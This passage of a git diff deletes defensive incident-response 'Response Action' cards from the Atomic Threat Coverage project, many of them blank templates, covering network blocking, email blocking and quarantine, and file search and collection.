-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>MS_border_firewall</li><li>MS_border_proxy</li><li>MS_border_ips</li><li>MS_border_ngfw</li><li>MS_host_firewall</li></ul>|
-
-### Workflow
-
-Description of the workflow for the Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1118_get_ability_to_block_port_internal_communication.md b/Atomic_Threat_Coverage/Response_Actions/RA_1118_get_ability_to_block_port_internal_communication.md
deleted file mode 100644
index 1fb33c6..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1118_get_ability_to_block_port_internal_communication.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to block port internal communication         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1118            |
-| **Description**             | Make sure you can block a network port for internal communications   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Network      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>MS_intranet_firewall</li><li>MS_intranet_proxy</li><li>MS_intranet_ips</li><li>MS_intranet_ngfw</li><li>MS_host_firewall</li></ul>|
-
-### Workflow
-
-Description of the workflow for the Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1119_get_ability_to_block_user_external_communication.md b/Atomic_Threat_Coverage/Response_Actions/RA_1119_get_ability_to_block_user_external_communication.md
deleted file mode 100644
index b9f6e72..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1119_get_ability_to_block_user_external_communication.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to block user external communication         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1119            |
-| **Description**             | Make sure you can block a user for external communications   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Network      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>MS_border_proxy</li><li>MS_border_ips</li><li>MS_border_ngfw</li><li>MS_nac</li></ul>|
-
-### Workflow
-
-Description of the workflow for the Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1120_get_ability_to_block_user_internal_communication.md b/Atomic_Threat_Coverage/Response_Actions/RA_1120_get_ability_to_block_user_internal_communication.md
deleted file mode 100644
index 6db911e..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1120_get_ability_to_block_user_internal_communication.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to block user internal communication         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1120            |
-| **Description**             | Make sure you can block a user for internal communications   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Network      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>MS_intranet_proxy</li><li>MS_intranet_ips</li><li>MS_intranet_ngfw</li><li>MS_nac</li></ul>|
-
-### Workflow
-
-Description of the workflow for the Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1121_get_ability_to_find_data_transferred_by_content_pattern.md b/Atomic_Threat_Coverage/Response_Actions/RA_1121_get_ability_to_find_data_transferred_by_content_pattern.md
deleted file mode 100644
index 2948e2e..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1121_get_ability_to_find_data_transferred_by_content_pattern.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to find data transferred by content pattern         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1121            |
-| **Description**             | Make sure you have the ability to find data transferred at a particular time in the past by its content pattern (i.e. specific string, keyword, binary pattern etc)   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Network      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1122_get_ability_to_block_data_transferring_by_content_pattern.md b/Atomic_Threat_Coverage/Response_Actions/RA_1122_get_ability_to_block_data_transferring_by_content_pattern.md
deleted file mode 100644
index 2e45f74..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1122_get_ability_to_block_data_transferring_by_content_pattern.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to block data transferring by content pattern         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1122            |
-| **Description**             | Make sure you have the ability to block data transferring by its content pattern (i.e. specific string, keyword, binary pattern etc)   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Network      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1123_get_ability_to_list_data_transferred.md b/Atomic_Threat_Coverage/Response_Actions/RA_1123_get_ability_to_list_data_transferred.md
deleted file mode 100644
index 4337739..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1123_get_ability_to_list_data_transferred.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to list data transferred         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1123            |
-| **Description**             | Make sure you have the ability to list the data that is being transferred at the moment or at a particular time in the past   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Network      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1124_get_ability_to_collect_transferred_data.md b/Atomic_Threat_Coverage/Response_Actions/RA_1124_get_ability_to_collect_transferred_data.md
deleted file mode 100644
index d10ebfa..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1124_get_ability_to_collect_transferred_data.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to collect transferred data         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1124            |
-| **Description**             | Make sure you have the ability to collect the data that is being transferred at the moment or at a particular time in the past   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Network      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1125_get_ability_to_identify_transferred_data.md b/Atomic_Threat_Coverage/Response_Actions/RA_1125_get_ability_to_identify_transferred_data.md
deleted file mode 100644
index 1aee30a..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1125_get_ability_to_identify_transferred_data.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to identify transferred data         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1125            |
-| **Description**             | Make sure you have the ability to identify the data that is being transferred at the moment or at a particular time in the past (i.e. its content, value)   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Network      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1126_find_data_transferred_by_content_pattern.md b/Atomic_Threat_Coverage/Response_Actions/RA_1126_find_data_transferred_by_content_pattern.md
deleted file mode 100644
index 09628fe..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1126_find_data_transferred_by_content_pattern.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Find data transferred by content pattern         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1126            |
-| **Description**             | Make sure you have the ability to find the data that is being transferred at the moment or at a particular time in the past by its content pattern   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Network      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1201_get_ability_to_list_users_opened_email_message.md b/Atomic_Threat_Coverage/Response_Actions/RA_1201_get_ability_to_list_users_opened_email_message.md
deleted file mode 100644
index 977dcc9..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1201_get_ability_to_list_users_opened_email_message.md
+++ /dev/null
@@ -1,14 +0,0 @@
-| Title                       | Get ability to list users opened email message         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1201            |
-| **Description**             | Make sure you have the ability to list users who opened a particular email message   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 06.05.2020 |
-| **Category**                | Email      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://practical365.com/exchange-server/tracking-read-email-messages-exchange-server/](https://practical365.com/exchange-server/tracking-read-email-messages-exchange-server/)</li></ul>|
-| **Requirements** |<ul><li>MS_email_server</li></ul>|
-
-### Workflow
-
-Make sure you have the ability to list users who opened/read a particular email message using the Email Server's functionality.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1202_get_ability_to_list_email_message_receivers.md b/Atomic_Threat_Coverage/Response_Actions/RA_1202_get_ability_to_list_email_message_receivers.md
deleted file mode 100644
index 3f6dab2..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1202_get_ability_to_list_email_message_receivers.md
+++ /dev/null
@@ -1,14 +0,0 @@
-| Title                       | Get ability to list email message receivers         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1202            |
-| **Description**             | Make sure you have the ability to list receivers of a particular email message   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 06.05.2020 |
-| **Category**                | Email      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://docs.microsoft.com/en-us/powershell/module/exchange/mail-flow/get-messagetrackinglog?view=exchange-ps](https://docs.microsoft.com/en-us/powershell/module/exchange/mail-flow/get-messagetrackinglog?view=exchange-ps)</li></ul>|
-| **Requirements** |<ul><li>MS_email_server</li></ul>|
-
-### Workflow
-
-Make sure you have the ability to list receivers of a particular email message using the Email Server's functionality.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1203_get_ability_to_block_email_domain.md b/Atomic_Threat_Coverage/Response_Actions/RA_1203_get_ability_to_block_email_domain.md
deleted file mode 100644
index 56864ec..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1203_get_ability_to_block_email_domain.md
+++ /dev/null
@@ -1,14 +0,0 @@
-| Title                       | Get ability to block email domain         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1203            |
-| **Description**             | Make sure you have the ability to block an email domain   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 07.05.2020 |
-| **Category**                | Email      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/configure-your-spam-filter-policies?view=o365-worldwide](https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/configure-your-spam-filter-policies?view=o365-worldwide)</li></ul>|
-| **Requirements** |<ul><li>MS_email_server</li></ul>|
-
-### Workflow
-
-Make sure you have the ability to block an email domain on an Email Server using its native filtering functionality.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1204_get_ability_to_block_email_sender.md b/Atomic_Threat_Coverage/Response_Actions/RA_1204_get_ability_to_block_email_sender.md
deleted file mode 100644
index c1efef0..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1204_get_ability_to_block_email_sender.md
+++ /dev/null
@@ -1,14 +0,0 @@
-| Title                       | Get ability to block email sender         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1204            |
-| **Description**             | Make sure you have the ability to block an email sender   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 06.05.2020 |
-| **Category**                | Email      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/configure-your-spam-filter-policies?view=o365-worldwide](https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/configure-your-spam-filter-policies?view=o365-worldwide)</li></ul>|
-| **Requirements** |<ul><li>MS_email_server</li></ul>|
-
-### Workflow
-
-Make sure you have the ability to block an email sender on an Email Server using its native filtering functionality.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1205_get_ability_to_delete_email_message.md b/Atomic_Threat_Coverage/Response_Actions/RA_1205_get_ability_to_delete_email_message.md
deleted file mode 100644
index 727b2bb..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1205_get_ability_to_delete_email_message.md
+++ /dev/null
@@ -1,14 +0,0 @@
-| Title                       | Get ability to delete email message         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1205            |
-| **Description**             | Make sure you have the ability to delete an email message   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 07.05.2020 |
-| **Category**                | Email      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://docs.microsoft.com/en-us/microsoft-365/compliance/search-for-and-delete-messages-in-your-organization?view=o365-worldwide](https://docs.microsoft.com/en-us/microsoft-365/compliance/search-for-and-delete-messages-in-your-organization?view=o365-worldwide)</li><li>[https://support.google.com/a/answer/7581662?hl=en](https://support.google.com/a/answer/7581662?hl=en)</li></ul>|
-| **Requirements** |<ul><li>MS_email_server</li></ul>|
-
-### Workflow
-
-Make sure you have the ability to delete an email message from an Email Server and users' email boxes using its native functionality.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1206_get_ability_to_quarantine_email_message.md b/Atomic_Threat_Coverage/Response_Actions/RA_1206_get_ability_to_quarantine_email_message.md
deleted file mode 100644
index b1b8450..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1206_get_ability_to_quarantine_email_message.md
+++ /dev/null
@@ -1,14 +0,0 @@
-| Title                       | Get ability to quarantine email message         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1206            |
-| **Description**             | Make sure you have the ability to quarantine an email message   |
-| **Author**                  | @atc_project        |
-| **Creation Date**           | 06.05.2020 |
-| **Category**                | Email      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://support.google.com/a/answer/6104172?hl=en](https://support.google.com/a/answer/6104172?hl=en)</li><li>[https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/quarantine-email-messages?view=o365-worldwide](https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/quarantine-email-messages?view=o365-worldwide)</li></ul>|
-| **Requirements** |<ul><li>MS_email_server</li></ul>|
-
-### Workflow
-
-Make sure you have the ability to quarantine an email message on an Email Server using its native functionality.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1207_get_ability_to_collect_email_message.md b/Atomic_Threat_Coverage/Response_Actions/RA_1207_get_ability_to_collect_email_message.md
deleted file mode 100644
index 8239282..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1207_get_ability_to_collect_email_message.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to collect email message         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1207            |
-| **Description**             | Make sure you have the ability to collect an email message   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Email      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1301_get_ability_to_list_files_created.md b/Atomic_Threat_Coverage/Response_Actions/RA_1301_get_ability_to_list_files_created.md
deleted file mode 100644
index 79ea2de..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1301_get_ability_to_list_files_created.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to list files created         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1301            |
-| **Description**             | Make sure you have the ability to list files that have been created at a particular time in the past   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1302_get_ability_to_list_files_modified.md b/Atomic_Threat_Coverage/Response_Actions/RA_1302_get_ability_to_list_files_modified.md
deleted file mode 100644
index 588aea4..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1302_get_ability_to_list_files_modified.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to list files modified         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1302            |
-| **Description**             | Make sure you have the ability to list files that have been modified at a particular time in the past   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1303_get_ability_to_list_files_deleted.md b/Atomic_Threat_Coverage/Response_Actions/RA_1303_get_ability_to_list_files_deleted.md
deleted file mode 100644
index 8ea1ce4..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1303_get_ability_to_list_files_deleted.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to list files deleted         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1303            |
-| **Description**             | Make sure you have the ability to list files that have been deleted at a particular time in the past   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1304_get_ability_to_list_files_downloaded.md b/Atomic_Threat_Coverage/Response_Actions/RA_1304_get_ability_to_list_files_downloaded.md
deleted file mode 100644
index 7210a85..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1304_get_ability_to_list_files_downloaded.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to list files downloaded         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1304            |
-| **Description**             | Make sure you have the ability to list files that have been downloaded from the internet at a particular time in the past   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1305_get_ability_to_list_files_with_tampered_timestamps.md b/Atomic_Threat_Coverage/Response_Actions/RA_1305_get_ability_to_list_files_with_tampered_timestamps.md
deleted file mode 100644
index cd7384d..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1305_get_ability_to_list_files_with_tampered_timestamps.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to list files with tampered timestamps         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1305            |
-| **Description**             | Make sure you have the ability to list files with a tampered timestamp   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1306_get_ability_to_find_file_by_path.md b/Atomic_Threat_Coverage/Response_Actions/RA_1306_get_ability_to_find_file_by_path.md
deleted file mode 100644
index 3e1c2fd..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1306_get_ability_to_find_file_by_path.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to find file by path         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1306            |
-| **Description**             | Make sure you have the ability to find a file by its path (including its name)   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1307_get_ability_to_find_file_by_metadata.md b/Atomic_Threat_Coverage/Response_Actions/RA_1307_get_ability_to_find_file_by_metadata.md
deleted file mode 100644
index 7819bd1..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1307_get_ability_to_find_file_by_metadata.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to find file by metadata         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1307            |
-| **Description**             | Make sure you have the ability to find file by its metadata (i.e. signature, permissions, MAC times)   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1308_get_ability_to_find_file_by_hash.md b/Atomic_Threat_Coverage/Response_Actions/RA_1308_get_ability_to_find_file_by_hash.md
deleted file mode 100644
index 1e668a5..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1308_get_ability_to_find_file_by_hash.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to find file by hash         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1308            |
-| **Description**             | Make sure you have the ability to find a file by its hash   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1309_get_ability_to_find_file_by_format.md b/Atomic_Threat_Coverage/Response_Actions/RA_1309_get_ability_to_find_file_by_format.md
deleted file mode 100644
index 304da32..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1309_get_ability_to_find_file_by_format.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to find file by format         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1309            |
-| **Description**             | Make sure you have the ability to find a file by its format   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.      
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1310_get_ability_to_find_file_by_content_pattern.md b/Atomic_Threat_Coverage/Response_Actions/RA_1310_get_ability_to_find_file_by_content_pattern.md
deleted file mode 100644
index 799fa1e..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1310_get_ability_to_find_file_by_content_pattern.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to find file by content pattern         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1310            |
-| **Description**             | Make sure you have the ability to find a file by its content pattern (i.e. specific string, keyword, binary pattern etc)   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1311_get_ability_to_collect_file.md b/Atomic_Threat_Coverage/Response_Actions/RA_1311_get_ability_to_collect_file.md
deleted file mode 100644
index a56ba3c..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1311_get_ability_to_collect_file.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to collect file         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1311            |
-| **Description**             | Make sure you have the ability to collect a specific file from a (remote) host or a system   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1312_get_ability_to_quarantine_file_by_path.md b/Atomic_Threat_Coverage/Response_Actions/RA_1312_get_ability_to_quarantine_file_by_path.md
deleted file mode 100644
index 5cdb676..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1312_get_ability_to_quarantine_file_by_path.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to quarantine file by path         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1312            |
-| **Description**             | Make sure you have the ability to block a file from being accessed by its path (including its name)   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0001: Preparation](../Response_Stages/RS0001.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_1313_get_ability_to_quarantine_file_by_hash.md b/Atomic_Threat_Coverage/Response_Actions/RA_1313_get_ability_to_quarantine_file_by_hash.md
deleted file mode 100644
index f0d8b3a..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_1313_get_ability_to_quarantine_file_by_hash.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Get ability to quarantine file by hash         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA1313            |
-| **Description**             | Make sure you have the ability to block a file from being accessed by its hash   |
-| **Author**                  | your name/nickname/twitter        |
